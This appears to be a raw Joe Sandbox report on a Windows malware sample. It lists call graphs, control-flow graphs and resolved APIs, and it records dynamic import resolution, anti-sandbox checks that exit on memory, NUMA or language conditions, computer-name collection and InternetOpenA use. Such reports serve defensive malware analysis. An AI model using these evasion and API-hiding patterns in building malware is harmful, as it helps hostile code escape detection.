26480 f64a60 2 API calls 26479->26480 26481 f63c94 26480->26481 26482 f64a60 2 API calls 26481->26482 26483 f63caa 26482->26483 26484 f64a60 2 API calls 26483->26484 26485 f63cc0 26484->26485 26486 f64a60 2 API calls 26485->26486 26487 f63cd9 26486->26487 26488 f64a60 2 API calls 26487->26488 26489 f63cef 26488->26489 26490 f64a60 2 API calls 26489->26490 26491 f63d05 26490->26491 26492 f64a60 2 API calls 26491->26492 26493 f63d1b 26492->26493 26494 f64a60 2 API calls 26493->26494 26495 f63d31 26494->26495 26496 f64a60 2 API calls 26495->26496 26497 f63d47 26496->26497 26498 f64a60 2 API calls 26497->26498 26499 f63d60 26498->26499 26500 f64a60 2 API calls 26499->26500 26501 f63d76 26500->26501 26502 f64a60 2 API calls 26501->26502 26503 f63d8c 26502->26503 26504 f64a60 2 API calls 26503->26504 26505 f63da2 26504->26505 26506 f64a60 2 API calls 26505->26506 26507 f63db8 26506->26507 26508 f64a60 2 API calls 26507->26508 26509 f63dce 26508->26509 26510 f64a60 2 API calls 26509->26510 26511 f63de7 26510->26511 26512 f64a60 2 API calls 26511->26512 26513 f63dfd 26512->26513 26514 f64a60 2 API calls 26513->26514 26515 f63e13 26514->26515 26516 f64a60 2 API calls 26515->26516 26517 f63e29 26516->26517 26518 f64a60 2 API calls 26517->26518 26519 f63e3f 26518->26519 26520 f64a60 2 API calls 26519->26520 26521 f63e55 26520->26521 26522 f64a60 2 API calls 26521->26522 26523 f63e6e 26522->26523 26524 f64a60 2 API calls 26523->26524 26525 f63e84 26524->26525 26526 f64a60 2 API calls 26525->26526 26527 f63e9a 26526->26527 26528 f64a60 2 API calls 26527->26528 26529 f63eb0 26528->26529 26530 f64a60 2 API calls 26529->26530 26531 f63ec6 26530->26531 26532 f64a60 2 API calls 26531->26532 26533 f63edc 26532->26533 26534 f64a60 2 API calls 26533->26534 26535 f63ef5 26534->26535 26536 f64a60 2 API calls 26535->26536 26537 f63f0b 26536->26537 26538 f64a60 2 API calls 26537->26538 26539 f63f21 26538->26539 26540 f64a60 2 API calls 26539->26540 26541 f63f37 26540->26541 26542 f64a60 2 
API calls 26541->26542 26543 f63f4d 26542->26543 26544 f64a60 2 API calls 26543->26544 26545 f63f63 26544->26545 26546 f64a60 2 API calls 26545->26546 26547 f63f7c 26546->26547 26548 f64a60 2 API calls 26547->26548 26549 f63f92 26548->26549 26550 f64a60 2 API calls 26549->26550 26551 f63fa8 26550->26551 26552 f64a60 2 API calls 26551->26552 26553 f63fbe 26552->26553 26554 f64a60 2 API calls 26553->26554 26555 f63fd4 26554->26555 26556 f64a60 2 API calls 26555->26556 26557 f63fea 26556->26557 26558 f64a60 2 API calls 26557->26558 26559 f64003 26558->26559 26560 f64a60 2 API calls 26559->26560 26561 f64019 26560->26561 26562 f64a60 2 API calls 26561->26562 26563 f6402f 26562->26563 26564 f64a60 2 API calls 26563->26564 26565 f64045 26564->26565 26566 f64a60 2 API calls 26565->26566 26567 f6405b 26566->26567 26568 f64a60 2 API calls 26567->26568 26569 f64071 26568->26569 26570 f64a60 2 API calls 26569->26570 26571 f6408a 26570->26571 26572 f64a60 2 API calls 26571->26572 26573 f640a0 26572->26573 26574 f64a60 2 API calls 26573->26574 26575 f640b6 26574->26575 26576 f64a60 2 API calls 26575->26576 26577 f640cc 26576->26577 26578 f64a60 2 API calls 26577->26578 26579 f640e2 26578->26579 26580 f64a60 2 API calls 26579->26580 26581 f640f8 26580->26581 26582 f64a60 2 API calls 26581->26582 26583 f64111 26582->26583 26584 f64a60 2 API calls 26583->26584 26585 f64127 26584->26585 26586 f64a60 2 API calls 26585->26586 26587 f6413d 26586->26587 26588 f64a60 2 API calls 26587->26588 26589 f64153 26588->26589 26590 f64a60 2 API calls 26589->26590 26591 f64169 26590->26591 26592 f64a60 2 API calls 26591->26592 26593 f6417f 26592->26593 26594 f64a60 2 API calls 26593->26594 26595 f64198 26594->26595 26596 f64a60 2 API calls 26595->26596 26597 f641ae 26596->26597 26598 f64a60 2 API calls 26597->26598 26599 f641c4 26598->26599 26600 f64a60 2 API calls 26599->26600 26601 f641da 26600->26601 26602 f64a60 2 API calls 26601->26602 26603 f641f0 26602->26603 26604 f64a60 2 API calls 
26603->26604 26605 f64206 26604->26605 26606 f64a60 2 API calls 26605->26606 26607 f6421f 26606->26607 26608 f64a60 2 API calls 26607->26608 26609 f64235 26608->26609 26610 f64a60 2 API calls 26609->26610 26611 f6424b 26610->26611 26612 f64a60 2 API calls 26611->26612 26613 f64261 26612->26613 26614 f64a60 2 API calls 26613->26614 26615 f64277 26614->26615 26616 f64a60 2 API calls 26615->26616 26617 f6428d 26616->26617 26618 f64a60 2 API calls 26617->26618 26619 f642a6 26618->26619 26620 f64a60 2 API calls 26619->26620 26621 f642bc 26620->26621 26622 f64a60 2 API calls 26621->26622 26623 f642d2 26622->26623 26624 f64a60 2 API calls 26623->26624 26625 f642e8 26624->26625 26626 f64a60 2 API calls 26625->26626 26627 f642fe 26626->26627 26628 f64a60 2 API calls 26627->26628 26629 f64314 26628->26629 26630 f64a60 2 API calls 26629->26630 26631 f6432d 26630->26631 26632 f64a60 2 API calls 26631->26632 26633 f64343 26632->26633 26634 f64a60 2 API calls 26633->26634 26635 f64359 26634->26635 26636 f64a60 2 API calls 26635->26636 26637 f6436f 26636->26637 26638 f64a60 2 API calls 26637->26638 26639 f64385 26638->26639 26640 f64a60 2 API calls 26639->26640 26641 f6439b 26640->26641 26642 f64a60 2 API calls 26641->26642 26643 f643b4 26642->26643 26644 f64a60 2 API calls 26643->26644 26645 f643ca 26644->26645 26646 f64a60 2 API calls 26645->26646 26647 f643e0 26646->26647 26648 f64a60 2 API calls 26647->26648 26649 f643f6 26648->26649 26650 f64a60 2 API calls 26649->26650 26651 f6440c 26650->26651 26652 f64a60 2 API calls 26651->26652 26653 f64422 26652->26653 26654 f64a60 2 API calls 26653->26654 26655 f6443b 26654->26655 26656 f64a60 2 API calls 26655->26656 26657 f64451 26656->26657 26658 f64a60 2 API calls 26657->26658 26659 f64467 26658->26659 26660 f64a60 2 API calls 26659->26660 26661 f6447d 26660->26661 26662 f64a60 2 API calls 26661->26662 26663 f64493 26662->26663 26664 f64a60 2 API calls 26663->26664 26665 f644a9 26664->26665 26666 f64a60 2 API calls 26665->26666 
26667 f644c2 26666->26667 26668 f64a60 2 API calls 26667->26668 26669 f644d8 26668->26669 26670 f64a60 2 API calls 26669->26670 26671 f644ee 26670->26671 26672 f64a60 2 API calls 26671->26672 26673 f64504 26672->26673 26674 f64a60 2 API calls 26673->26674 26675 f6451a 26674->26675 26676 f64a60 2 API calls 26675->26676 26677 f64530 26676->26677 26678 f64a60 2 API calls 26677->26678 26679 f64549 26678->26679 26680 f64a60 2 API calls 26679->26680 26681 f6455f 26680->26681 26682 f64a60 2 API calls 26681->26682 26683 f64575 26682->26683 26684 f64a60 2 API calls 26683->26684 26685 f6458b 26684->26685 26686 f64a60 2 API calls 26685->26686 26687 f645a1 26686->26687 26688 f64a60 2 API calls 26687->26688 26689 f645b7 26688->26689 26690 f64a60 2 API calls 26689->26690 26691 f645d0 26690->26691 26692 f64a60 2 API calls 26691->26692 26693 f645e6 26692->26693 26694 f64a60 2 API calls 26693->26694 26695 f645fc 26694->26695 26696 f64a60 2 API calls 26695->26696 26697 f64612 26696->26697 26698 f64a60 2 API calls 26697->26698 26699 f64628 26698->26699 26700 f64a60 2 API calls 26699->26700 26701 f6463e 26700->26701 26702 f64a60 2 API calls 26701->26702 26703 f64657 26702->26703 26704 f64a60 2 API calls 26703->26704 26705 f6466d 26704->26705 26706 f64a60 2 API calls 26705->26706 26707 f64683 26706->26707 26708 f64a60 2 API calls 26707->26708 26709 f64699 26708->26709 26710 f64a60 2 API calls 26709->26710 26711 f646af 26710->26711 26712 f64a60 2 API calls 26711->26712 26713 f646c5 26712->26713 26714 f64a60 2 API calls 26713->26714 26715 f646de 26714->26715 26716 f64a60 2 API calls 26715->26716 26717 f646f4 26716->26717 26718 f64a60 2 API calls 26717->26718 26719 f6470a 26718->26719 26720 f64a60 2 API calls 26719->26720 26721 f64720 26720->26721 26722 f64a60 2 API calls 26721->26722 26723 f64736 26722->26723 26724 f64a60 2 API calls 26723->26724 26725 f6474c 26724->26725 26726 f64a60 2 API calls 26725->26726 26727 f64765 26726->26727 26728 f64a60 2 API calls 26727->26728 26729 f6477b 
26728->26729 26730 f64a60 2 API calls 26729->26730 26731 f64791 26730->26731 26732 f64a60 2 API calls 26731->26732 26733 f647a7 26732->26733 26734 f64a60 2 API calls 26733->26734 26735 f647bd 26734->26735 26736 f64a60 2 API calls 26735->26736 26737 f647d3 26736->26737 26738 f64a60 2 API calls 26737->26738 26739 f647ec 26738->26739 26740 f64a60 2 API calls 26739->26740 26741 f64802 26740->26741 26742 f64a60 2 API calls 26741->26742 26743 f64818 26742->26743 26744 f64a60 2 API calls 26743->26744 26745 f6482e 26744->26745 26746 f64a60 2 API calls 26745->26746 26747 f64844 26746->26747 26748 f64a60 2 API calls 26747->26748 26749 f6485a 26748->26749 26750 f64a60 2 API calls 26749->26750 26751 f64873 26750->26751 26752 f64a60 2 API calls 26751->26752 26753 f64889 26752->26753 26754 f64a60 2 API calls 26753->26754 26755 f6489f 26754->26755 26756 f64a60 2 API calls 26755->26756 26757 f648b5 26756->26757 26758 f64a60 2 API calls 26757->26758 26759 f648cb 26758->26759 26760 f64a60 2 API calls 26759->26760 26761 f648e1 26760->26761 26762 f64a60 2 API calls 26761->26762 26763 f648fa 26762->26763 26764 f64a60 2 API calls 26763->26764 26765 f64910 26764->26765 26766 f64a60 2 API calls 26765->26766 26767 f64926 26766->26767 26768 f64a60 2 API calls 26767->26768 26769 f6493c 26768->26769 26770 f64a60 2 API calls 26769->26770 26771 f64952 26770->26771 26772 f64a60 2 API calls 26771->26772 26773 f64968 26772->26773 26774 f64a60 2 API calls 26773->26774 26775 f64981 26774->26775 26776 f64a60 2 API calls 26775->26776 26777 f64997 26776->26777 26778 f64a60 2 API calls 26777->26778 26779 f649ad 26778->26779 26780 f64a60 2 API calls 26779->26780 26781 f649c3 26780->26781 26782 f64a60 2 API calls 26781->26782 26783 f649d9 26782->26783 26784 f64a60 2 API calls 26783->26784 26785 f649ef 26784->26785 26786 f64a60 2 API calls 26785->26786 26787 f64a08 26786->26787 26788 f64a60 2 API calls 26787->26788 26789 f64a1e 26788->26789 26790 f64a60 2 API calls 26789->26790 26791 f64a34 26790->26791 
26792 f64a60 2 API calls 26791->26792 26793 f64a4a 26792->26793 26794 f866e0 26793->26794 26795 f866ed 43 API calls 26794->26795 26796 f86afe 8 API calls 26794->26796 26795->26796 26797 f86c08 26796->26797 26798 f86b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26796->26798 26799 f86cd2 26797->26799 26800 f86c15 8 API calls 26797->26800 26798->26797 26801 f86cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26799->26801 26802 f86d4f 26799->26802 26800->26799 26801->26802 26803 f86de9 26802->26803 26804 f86d5c 6 API calls 26802->26804 26805 f86f10 26803->26805 26806 f86df6 12 API calls 26803->26806 26804->26803 26807 f86f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26805->26807 26808 f86f8d 26805->26808 26806->26805 26807->26808 26809 f86fc1 26808->26809 26810 f86f96 GetProcAddress GetProcAddress 26808->26810 26811 f86fca GetProcAddress GetProcAddress 26809->26811 26812 f86ff5 26809->26812 26810->26809 26811->26812 26813 f870ed 26812->26813 26814 f87002 10 API calls 26812->26814 26815 f87152 26813->26815 26816 f870f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26813->26816 26814->26813 26817 f8715b GetProcAddress 26815->26817 26818 f8716e 26815->26818 26816->26815 26817->26818 26819 f8051f 26818->26819 26820 f87177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26818->26820 26821 f61530 26819->26821 26820->26819 27130 f61610 26821->27130 26823 f6153b 26824 f61555 lstrcpy 26823->26824 26825 f6155d 26823->26825 26824->26825 26826 f61577 lstrcpy 26825->26826 26827 f6157f 26825->26827 26826->26827 26828 f61599 lstrcpy 26827->26828 26829 f615a1 26827->26829 26828->26829 26830 f61605 26829->26830 26831 f615fd lstrcpy 26829->26831 26832 f7f1b0 lstrlen 26830->26832 26831->26830 26833 f7f1e4 26832->26833 26834 f7f1f7 lstrlen 26833->26834 26835 f7f1eb lstrcpy 26833->26835 26836 f7f208 26834->26836 26835->26834 26837 f7f20f lstrcpy 26836->26837 26838 
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F64C7F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64CD2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D05
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D35
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64D73
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F64DA6
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F64DB6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------
                                    • API String ID: 2041821634-2370822465
                                    • Opcode ID: 104c45b9a70f82226ef81a936d507e3cc27994423a93c479b165b8222a4895ae
                                    • Instruction ID: 583cf0378385b84405fdd414d5b4022da2f7d1c7f213bac5f6d5f77471f391e7
                                    • Opcode Fuzzy Hash: 104c45b9a70f82226ef81a936d507e3cc27994423a93c479b165b8222a4895ae
                                    • Instruction Fuzzy Hash: 50527171D0161A9BDB21FFA4DC49B9E77B9AF44720F184028F915E7241DB78EC42ABE0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2125 f86390-f863bd GetPEB 2126 f865c3-f86623 LoadLibraryA * 5 2125->2126 2127 f863c3-f865be call f862f0 GetProcAddress * 20 2125->2127 2129 f86638-f8663f 2126->2129 2130 f86625-f86633 GetProcAddress 2126->2130 2127->2126 2132 f8666c-f86673 2129->2132 2133 f86641-f86667 GetProcAddress * 2 2129->2133 2130->2129 2134 f86688-f8668f 2132->2134 2135 f86675-f86683 GetProcAddress 2132->2135 2133->2132 2137 f86691-f8669f GetProcAddress 2134->2137 2138 f866a4-f866ab 2134->2138 2135->2134 2137->2138 2139 f866ad-f866d2 GetProcAddress * 2 2138->2139 2140 f866d7-f866da 2138->2140 2139->2140
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00A92260), ref: 00F863E9
                                    • GetProcAddress.KERNEL32(74DD0000,00A922D8), ref: 00F86402
                                    • GetProcAddress.KERNEL32(74DD0000,00A92278), ref: 00F8641A
                                    • GetProcAddress.KERNEL32(74DD0000,00A92290), ref: 00F86432
                                    • GetProcAddress.KERNEL32(74DD0000,00A98F58), ref: 00F8644B
                                    • GetProcAddress.KERNEL32(74DD0000,00A85AB0), ref: 00F86463
                                    • GetProcAddress.KERNEL32(74DD0000,00A85DD0), ref: 00F8647B
                                    • GetProcAddress.KERNEL32(74DD0000,00A92410), ref: 00F86494
                                    • GetProcAddress.KERNEL32(74DD0000,00A924A0), ref: 00F864AC
                                    • GetProcAddress.KERNEL32(74DD0000,00A923B0), ref: 00F864C4
                                    • GetProcAddress.KERNEL32(74DD0000,00A922A8), ref: 00F864DD
                                    • GetProcAddress.KERNEL32(74DD0000,00A85CB0), ref: 00F864F5
                                    • GetProcAddress.KERNEL32(74DD0000,00A92350), ref: 00F8650D
                                    • GetProcAddress.KERNEL32(74DD0000,00A92440), ref: 00F86526
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D10), ref: 00F8653E
                                    • GetProcAddress.KERNEL32(74DD0000,00A92458), ref: 00F86556
                                    • GetProcAddress.KERNEL32(74DD0000,00A923C8), ref: 00F8656F
                                    • GetProcAddress.KERNEL32(74DD0000,00A85C10), ref: 00F86587
                                    • GetProcAddress.KERNEL32(74DD0000,00A92320), ref: 00F8659F
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D70), ref: 00F865B8
                                    • LoadLibraryA.KERNEL32(00A92380,?,?,?,00F81C03), ref: 00F865C9
                                    • LoadLibraryA.KERNEL32(00A92308,?,?,?,00F81C03), ref: 00F865DB
                                    • LoadLibraryA.KERNEL32(00A92338,?,?,?,00F81C03), ref: 00F865ED
                                    • LoadLibraryA.KERNEL32(00A92398,?,?,?,00F81C03), ref: 00F865FE
                                    • LoadLibraryA.KERNEL32(00A923E0,?,?,?,00F81C03), ref: 00F86610
                                    • GetProcAddress.KERNEL32(75A70000,00A923F8), ref: 00F8662D
                                    • GetProcAddress.KERNEL32(75290000,00A92428), ref: 00F86649
                                    • GetProcAddress.KERNEL32(75290000,00A92470), ref: 00F86661
                                    • GetProcAddress.KERNEL32(75BD0000,00A92488), ref: 00F8667D
                                    • GetProcAddress.KERNEL32(75450000,00A85CD0), ref: 00F86699
                                    • GetProcAddress.KERNEL32(76E90000,00A99088), ref: 00F866B5
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00F866CC
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00F866C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: ff4ad629c6439ec93026bf109723b5e7908317ea8012d881355db4743f156abd
                                    • Instruction ID: 5e385bc12d42f866f8f7f78884f602e519eca3557331449b7d9a1acd4a446a31
                                    • Opcode Fuzzy Hash: ff4ad629c6439ec93026bf109723b5e7908317ea8012d881355db4743f156abd
                                    • Instruction Fuzzy Hash: 6FA15DF5A152089FD77CDFA4E948A2637BDF789648308853DE936C3348E734A890DB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2141 f81bf0-f81c0b call f62a90 call f86390 2146 f81c1a-f81c27 call f62930 2141->2146 2147 f81c0d 2141->2147 2151 f81c29-f81c2f lstrcpy 2146->2151 2152 f81c35-f81c63 2146->2152 2148 f81c10-f81c18 2147->2148 2148->2146 2148->2148 2151->2152 2156 f81c6d-f81c7b GetSystemInfo 2152->2156 2157 f81c65-f81c67 ExitProcess 2152->2157 2158 f81c7d-f81c7f ExitProcess 2156->2158 2159 f81c85-f81ca0 call f61030 call f610c0 GetUserDefaultLangID 2156->2159 2164 f81cb8-f81cca call f82ad0 call f83e10 2159->2164 2165 f81ca2-f81ca9 2159->2165 2171 f81ccc-f81cde call f82a40 call f83e10 2164->2171 2172 f81ce7-f81d06 lstrlen call f62930 2164->2172 2165->2164 2166 f81cb0-f81cb2 ExitProcess 2165->2166 2171->2172 2185 f81ce0-f81ce1 ExitProcess 2171->2185 2177 f81d08-f81d0d 2172->2177 2178 f81d23-f81d40 lstrlen call f62930 2172->2178 2177->2178 2180 f81d0f-f81d11 2177->2180 2186 f81d5a-f81d7b call f82ad0 lstrlen call f62930 2178->2186 2187 f81d42-f81d44 2178->2187 2180->2178 2183 f81d13-f81d1d lstrcpy lstrcat 2180->2183 2183->2178 2193 f81d9a-f81db4 lstrlen call f62930 2186->2193 2194 f81d7d-f81d7f 2186->2194 2187->2186 2188 f81d46-f81d54 lstrcpy lstrcat 2187->2188 2188->2186 2199 f81dce-f81deb call f82a40 lstrlen call f62930 2193->2199 2200 f81db6-f81db8 2193->2200 2194->2193 2196 f81d81-f81d85 2194->2196 2196->2193 2198 f81d87-f81d94 lstrcpy lstrcat 2196->2198 2198->2193 2206 f81e0a-f81e0f 2199->2206 2207 f81ded-f81def 2199->2207 2200->2199 2201 f81dba-f81dc8 lstrcpy lstrcat 2200->2201 2201->2199 2209 f81e11 call f62a20 2206->2209 2210 f81e16-f81e22 call f62930 2206->2210 2207->2206 2208 f81df1-f81df5 2207->2208 2208->2206 2212 f81df7-f81e04 lstrcpy lstrcat 2208->2212 2209->2210 2215 f81e30-f81e66 call f62a20 * 5 OpenEventA 2210->2215 2216 f81e24-f81e26 2210->2216 2212->2206 2228 f81e68-f81e8a CloseHandle Sleep OpenEventA 2215->2228 2229 f81e8c-f81ea0 CreateEventA call f81b20 call f7ffd0 2215->2229 2216->2215 2217 f81e28-f81e2a lstrcpy 
2216->2217 2217->2215 2228->2228 2228->2229 2233 f81ea5-f81eae CloseHandle ExitProcess 2229->2233
                                    APIs
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92260), ref: 00F863E9
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A922D8), ref: 00F86402
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92278), ref: 00F8641A
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92290), ref: 00F86432
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A98F58), ref: 00F8644B
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85AB0), ref: 00F86463
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85DD0), ref: 00F8647B
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92410), ref: 00F86494
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A924A0), ref: 00F864AC
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A923B0), ref: 00F864C4
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A922A8), ref: 00F864DD
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A85CB0), ref: 00F864F5
                                      • Part of subcall function 00F86390: GetProcAddress.KERNEL32(74DD0000,00A92350), ref: 00F8650D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F81C2F
                                    • ExitProcess.KERNEL32 ref: 00F81C67
                                    • GetSystemInfo.KERNEL32(?), ref: 00F81C71
                                    • ExitProcess.KERNEL32 ref: 00F81C7F
                                      • Part of subcall function 00F61030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F61046
                                      • Part of subcall function 00F61030: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F6104D
                                      • Part of subcall function 00F61030: ExitProcess.KERNEL32 ref: 00F61058
                                      • Part of subcall function 00F610C0: GlobalMemoryStatusEx.KERNEL32 ref: 00F610EA
                                      • Part of subcall function 00F610C0: ExitProcess.KERNEL32 ref: 00F61114
                                    • GetUserDefaultLangID.KERNEL32 ref: 00F81C8F
                                    • ExitProcess.KERNEL32 ref: 00F81CB2
                                    • ExitProcess.KERNEL32 ref: 00F81CE1
                                    • lstrlen.KERNEL32(00A99048), ref: 00F81CEE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81D15
                                    • lstrcat.KERNEL32(00000000,00A99048), ref: 00F81D1D
                                    • lstrlen.KERNEL32(00F94B98), ref: 00F81D28
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81D48
                                    • lstrcat.KERNEL32(00000000,00F94B98), ref: 00F81D54
                                    • lstrlen.KERNEL32(00000000), ref: 00F81D63
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81D89
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81D94
                                    • lstrlen.KERNEL32(00F94B98), ref: 00F81D9F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81DBC
                                    • lstrcat.KERNEL32(00000000,00F94B98), ref: 00F81DC8
                                    • lstrlen.KERNEL32(00000000), ref: 00F81DD7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F81DF9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F81E04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                    • String ID:
                                    • API String ID: 3366406952-0
                                    • Opcode ID: b03efd1291fe26f96558c89239b6e19eebd4c36947c02510c478b573c0b8e873
                                    • Instruction ID: 70b811b57691cb4098abbc6e63d831135e7bf304dfa1d4be7a41504e9dfde6ba
                                    • Opcode Fuzzy Hash: b03efd1291fe26f96558c89239b6e19eebd4c36947c02510c478b573c0b8e873
                                    • Instruction Fuzzy Hash: 7371C231900209ABDB34BBB0DC8DBAE36BDBF45715F040138F936D6145DB78A842EB61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2850 f64a60-f64afc RtlAllocateHeap 2867 f64afe-f64b03 2850->2867 2868 f64b7a-f64bbe VirtualProtect 2850->2868 2869 f64b06-f64b78 2867->2869 2869->2868
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F64AA2
                                    • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00F64BB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-3329630956
                                    • Opcode ID: 7177083bf889d875332c8e53c2eeb656e99e10c8cc5ac80cab5a59692fdfd053
                                    • Instruction ID: 741e6bda379cda2b38fa7d3ac181d28597d75258588966ae0bf5c6a1acbaca4d
                                    • Opcode Fuzzy Hash: 7177083bf889d875332c8e53c2eeb656e99e10c8cc5ac80cab5a59692fdfd053
                                    • Instruction Fuzzy Hash: 0C31D819F8022D76AB22EBEF6CC7F5F6E55FF95B60B014056740857180C9A1F502EAE3

                                    Control-flow Graph (basic blocks: id, address range, APIs called, successor blocks)

                                    • 2957: f82ad0-f82b22, GetProcessHeap, RtlAllocateHeap, GetComputerNameA → 2958, 2959
                                    • 2958: f82b44-f82b59 (no successors)
                                    • 2959: f82b24-f82b36 (no successors)
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82AFF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82B06
                                    • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00F82B1A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: e0aeed1acb7de490755dfeef169aabc8fc88b631198460a45ce100d76e432061
                                    • Instruction ID: ecc1d5526d462420c7a02d74401dc7ad22012e9476277f733faabc3130b58a3e
                                    • Opcode Fuzzy Hash: e0aeed1acb7de490755dfeef169aabc8fc88b631198460a45ce100d76e432061
                                    • Instruction Fuzzy Hash: F301D172A44208ABDB10DF99EC45BAEF7BCF748B21F00027AF929E3780D775590087A1
                                    APIs
